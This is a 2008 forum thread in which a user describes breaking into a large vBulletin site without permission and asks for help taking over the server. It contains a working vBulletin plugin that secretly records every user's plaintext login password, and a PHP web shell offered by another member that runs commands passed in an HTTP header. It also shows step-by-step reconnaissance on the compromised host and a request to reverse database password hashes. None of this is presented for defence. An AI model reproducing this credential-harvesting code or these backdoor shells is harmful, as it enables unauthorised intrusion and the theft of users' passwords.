Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
March 20, 2023
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145

People Online:
Visitors: 379
Members: 0
Total: 379
PacketStorm News
·301 Moved Permanently

read more...
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> vBulletin Board -> Need help finishing the job :D Goto page 1, 2  Next
Post new topic  Reply to topic View previous topic :: View next topic 
Need help finishing the job :D
PostPosted: Wed Sep 17, 2008 4:08 am Reply with quote
ayvegh
Regular user
Regular user
 
Joined: Sep 17, 2008
Posts: 12




Hi everybody.

I've hacked a very large vBulletin-powered site.
I'm knowledgeable in PHP, MySQL, etc.

I have access to phpMyAdmin using the username/password from the config.php file, and I have installed my own little "swiss army knife" script so I can manipulate things from a script perspective.

I do NOT have FTP access Sad

I do know, however, that the Admin of the site uses the same password for everything, so if I can manage to catch his password as he logs in, I will have complete control over the entire server (it's a dedicated rig; I'm able to browse the root of the machine using my script, although obviously my permissions are limited, since I'm running as the PHP user).

I've unobtrusively installed a plugin which catches all logins - here's what the plugin code and save table look like:
Plugin:
Code:
$vbulletin->db->query_write("INSERT INTO " . TABLE_PREFIX . "loginz (userid, username, password, password_md5, password_md5_utf, ipaddress) VALUES (" . $vbulletin->userinfo['userid'] . ", '" . $vbulletin->db->escape_string($vbulletin->userinfo['username']) . "', '" . $vbulletin->db->escape_string($vbulletin->GPC['vb_login_password']) . "', '" . $vbulletin->db->escape_string($vbulletin->GPC['vb_login_md5password']) . "', '" . $vbulletin->db->escape_string($vbulletin->GPC['vb_login_md5password_utf']) . "', '" . $vbulletin->db->escape_string(IPADDRESS) . "' )");

Table:
Code:
CREATE TABLE `loginz` (
  `logid` int(10) NOT NULL auto_increment,
  `userid` int(10) NOT NULL default '0',
  `username` varchar(100) NOT NULL default '',
  `password` varchar(255) NOT NULL,
  `password_md5` varchar(255) NOT NULL,
  `password_md5_utf` varchar(255) NOT NULL,
  `ipaddress` varchar(15) NOT NULL default '',
  `date` timestamp NOT NULL default CURRENT_TIMESTAMP on update CURRENT_TIMESTAMP,
  PRIMARY KEY  (`logid`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;


What I need to know is: How can I disable the automatic MD5-ing of the password by the JavaScript in the login form?

I know that this line:
Code:
define('DISABLE_PASSWORD_CLEARING', true);

works to do that if it's in the config.php file, but can it be implemented via a plugin?

If not, is there a way I can disable just the JavaScript in the login form (I want to remain relatively undetected, so I won't turn off AJAX for the entire site, even though there is an option for that)?

Any help regarding this will be very much appreciated, and I thank you in advance.

ayvegh
View user's profile Send private message
PostPosted: Wed Sep 17, 2008 5:29 am Reply with quote
pexli
Valuable expert
Valuable expert
 
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




Try password for mysql to ftp,admin panel ..etc.If you don't have shell upload some small shell on server and look maybe this guy have other sites on this server.Search admin panel's,passwords,other databases ....etc.You need to get owner level and then you can edit the login.php and catch password.
View user's profile Send private message
PostPosted: Wed Sep 17, 2008 5:55 am Reply with quote
ayvegh
Regular user
Regular user
 
Joined: Sep 17, 2008
Posts: 12




koko wrote:
Try password for mysql to ftp,admin panel ..etc.If you don't have shell upload some small shell on server and look maybe this guy have other sites on this server.Search admin panel's,passwords,other databases ....etc.You need to get owner level and then you can edit the login.php and catch password.

I know one of the Admin's passwords, the other one that he uses everwhere.
It's not the same on here, and the MySQL password is randomly generated.

I've gone through every other site hosted on the server; none of them are even live anymore, and none of them have valid password data in them.

What do you mean by "shell"? Do you have any sample shell scripts I could look at?
View user's profile Send private message
PostPosted: Wed Sep 17, 2008 7:07 am Reply with quote
pexli
Valuable expert
Valuable expert
 
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




Something like

Code:
<?php $footer = @getenv('HTTP_FOOTER'); if($footer) {@passthru($footer); exit;} ?>


Working with headers

FOOTER:ls -al
View user's profile Send private message
PostPosted: Wed Sep 17, 2008 11:49 pm Reply with quote
ayvegh
Regular user
Regular user
 
Joined: Sep 17, 2008
Posts: 12




Hmm... now I'm really confused.

I have read-only access to the root of the filesystem.
What would that script accomplish?

Many thanks,
ayvegh
View user's profile Send private message
PostPosted: Thu Sep 18, 2008 5:23 am Reply with quote
pexli
Valuable expert
Valuable expert
 
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




ayvegh wrote:
Hmm... now I'm really confused.

I have read-only access to the root of the filesystem.
What would that script accomplish?

Many thanks,
ayvegh


This shell don't give you root perm's.nobody or apache in best way owner/owner

Try FOOTER:id
View user's profile Send private message
PostPosted: Fri Sep 19, 2008 4:26 am Reply with quote
ayvegh
Regular user
Regular user
 
Joined: Sep 17, 2008
Posts: 12




I hate to sound like such a noob, but I have two questions:

1. What are you trying to accomplish with these shell scripts?

2. How do I use these scripts? <?php exec(); ?> ?

Thanks again,
ayvegh
View user's profile Send private message
PostPosted: Fri Sep 19, 2008 5:32 am Reply with quote
pexli
Valuable expert
Valuable expert
 
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




ayvegh wrote:
I hate to sound like such a noob, but I have two questions:

1. What are you trying to accomplish with these shell scripts?

2. How do I use these scripts? <?php exec(); ?> ?

Thanks again,
ayvegh


1.Social injeenering.
2.Only like this <?php @exec('cmd'); ?>
Working with POST cmd=ls -al
View user's profile Send private message
PostPosted: Fri Sep 19, 2008 5:54 am Reply with quote
ayvegh
Regular user
Regular user
 
Joined: Sep 17, 2008
Posts: 12




Hmm... that's not any form of social engineering I know of, but hey, I'm the noob here, right? Wink

Okay, so I ran this code from my location in the web directory:
Code:
$output = NULL;
@exec("ls -al /", $output);
print_r($output);

And got this output:
Code:
Array
(
    [0] => total 125
    [1] => drwxr-xr-x  22 root root  4096 2007-05-08 12:21 .
    [2] => drwxr-xr-x  22 root root  4096 2007-05-08 12:21 ..
    [3] => drwxr-xr-x   2 root root  4096 2008-06-01 09:17 bin
    [4] => drwxr-xr-x   4 root root  1024 2008-06-01 09:18 boot
    [5] => lrwxrwxrwx   1 root root    11 2007-05-08 12:16 cdrom -> media/cdrom
    [6] => drwxr-xr-x  13 root root  3900 2008-04-02 06:47 dev
    [7] => drwxr-xr-x  72 root root  4096 2008-06-01 09:19 etc
    [8] => drwxr-xr-x   6 root root  4096 2007-07-01 14:59 home
    [9] => drwxr-xr-x   2 root root  4096 2007-05-08 12:17 initrd
    [10] => lrwxrwxrwx   1 root root    28 2007-05-08 12:18 initrd.img -> boot/initrd.img-2.6.18-4-686
    [11] => drwxr-xr-x  12 root root 12288 2008-06-01 09:17 lib
    [12] => drwx------   2 root root 16384 2007-05-08 12:14 lost+found
    [13] => drwxr-xr-x   3 root root  4096 2007-05-08 12:16 media
    [14] => drwxr-xr-x   2 root root  4096 2006-10-28 16:06 mnt
    [15] => drwxr-xr-x   2 root root  4096 2007-05-08 12:17 opt
    [16] => dr-xr-xr-x 183 root root     0 2008-04-02 06:46 proc
    [17] => drwxr-xr-x  11 root root  4096 2008-06-18 14:24 root
    [18] => drwxr-xr-x   2 root root  4096 2008-06-01 09:17 sbin
    [19] => drwxr-xr-x   2 root root  4096 2007-03-07 23:56 selinux
    [20] => drwxr-xr-x   2 root root  4096 2007-05-08 12:17 srv
    [21] => drwxr-xr-x  11 root root     0 2008-04-02 06:46 sys
    [22] => drwxrwxrwt  21 root root 36864 2008-09-19 07:47 tmp
    [23] => drwxr-xr-x  11 root root  4096 2007-05-10 18:32 usr
    [24] => drwxr-xr-x  14 root root  4096 2007-05-10 18:31 var
    [25] => lrwxrwxrwx   1 root root    25 2007-05-08 12:18 vmlinuz -> boot/vmlinuz-2.6.18-4-686
)

What does that do for me, aside from telling me that I can't do much in the root directory (unless I'm reading those chmod letters wrong)?

Thanks again,
ayvegh
View user's profile Send private message
PostPosted: Fri Sep 19, 2008 6:30 am Reply with quote
pexli
Valuable expert
Valuable expert
 
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




Try with pwd
Then ls -al /bla/bla/ from pwd result
View user's profile Send private message
PostPosted: Fri Sep 19, 2008 6:12 pm Reply with quote
ayvegh
Regular user
Regular user
 
Joined: Sep 17, 2008
Posts: 12




Okay, so I've refined my code a bit:
Code:
print_r(shell_exec('pwd'));

All that gives me is the directory string of where my script is located:
Code:
/var/www/[redacted]/www/[redacted]

Doing this:
Code:
print_r(shell_exec('ls -al ' . shell_exec('pwd')));

Gives me the directory listing for my scripts location, which looks like this:
Code:
total 124
drwxrwxrwx  2    10001 www-data  4096 2008-09-15 08:02 .
drwxr-xr-x 26    10001 www-data  4096 2008-09-01 15:59 ..
-rw-r--r--  1    10001 www-data  1848 2008-04-25 20:50 redacted.php
-rw-r--r--  1    10001 www-data  6664 2008-04-25 20:50 redacted.php
-rw-r--r--  1    10001 www-data     0 2008-04-25 20:50 index.html
-rw-r--r--  1 www-data www-data  6099 2008-09-15 08:01 redacted.php <-- My script, created using an exploit in the ACP ;)
-rw-r--r--  1    10001 www-data  7223 2006-11-24 10:26 redacted.php
-rw-r--r--  1    10001 www-data  5689 2008-04-25 20:50 redacted.php
-rw-r--r--  1    10001 www-data  2108 2008-04-25 20:50 redacted.php
-rw-r--r--  1    10001 www-data  2819 2008-04-25 20:50 redacted.php
-rw-r--r--  1    10001 www-data 30243 2008-04-25 20:50 redacted.php
-rw-r--r--  1    10001 www-data  7633 2008-04-25 20:50 redacted.php
-rw-r--r--  1    10001 www-data  1659 2008-04-25 20:50 redacted.php
-rw-r--r--  1    10001 www-data  1098 2005-09-16 05:00 redacted.php
-rw-r--r--  1    10001 www-data 10754 2008-04-25 20:50 redacted.php
-rw-r--r--  1    10001 www-data  3443 2008-04-25 20:50 redacted.php
-rw-r--r--  1    10001 www-data   534 2006-04-05 05:00 redacted.php
-rw-r--r--  1    10001 www-data  4032 2008-04-25 20:50 welcomeblock.php

But I have all of that information already, as I said.
The "My script" highlighted above is what I'm using to execute these commands.

It has a built-in filebrowser/downloader (I'm adding zipping and maybe RAR functions soon), and a code executor, inputted via the address bar in Base64.

So what does this do for me? Smile

Thanks again for your patience,
ayvegh
View user's profile Send private message
PostPosted: Fri Sep 19, 2008 8:13 pm Reply with quote
pexli
Valuable expert
Valuable expert
 
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




next command 'id'
View user's profile Send private message
PostPosted: Fri Sep 19, 2008 8:26 pm Reply with quote
ayvegh
Regular user
Regular user
 
Joined: Sep 17, 2008
Posts: 12




Code:
print_r(shell_exec('id'));

gives
Code:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
View user's profile Send private message
PostPosted: Sat Sep 20, 2008 8:12 am Reply with quote
pexli
Valuable expert
Valuable expert
 
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




Show me

ls -al /var/www/[redacted]/www/
View user's profile Send private message
PostPosted: Sun Sep 21, 2008 2:07 am Reply with quote
ayvegh
Regular user
Regular user
 
Joined: Sep 17, 2008
Posts: 12




koko wrote:
Show me

ls -al /var/www/[redacted]/www/

No need to post the whole thing- here's a directory and a file:
Code:
total 3110
drwxr-xr-x  4 10001 www-data   4096 2008-09-01 16:18 admincp
-rw-r--r--  1 10001 www-data  39174 2008-01-27 01:00 global.php

Having seen the FTP users database (and unsuccessfully adding a user), I can tell you that userid 10001 is the Admin's FTP account.

Any way to reverse MySQL PASSWORD() hashing? Wink
View user's profile Send private message
Need help finishing the job :D
  www.waraxe.us Forum Index -> vBulletin Board
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT  
Page 1 of 2  
Goto page 1, 2  Next
  
  
 Post new topic  Reply to topic  




Powered by phpBB 2001-2008 phpBB Group






Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2020 Janek Vind "waraxe"
Page Generation: 0.171 Seconds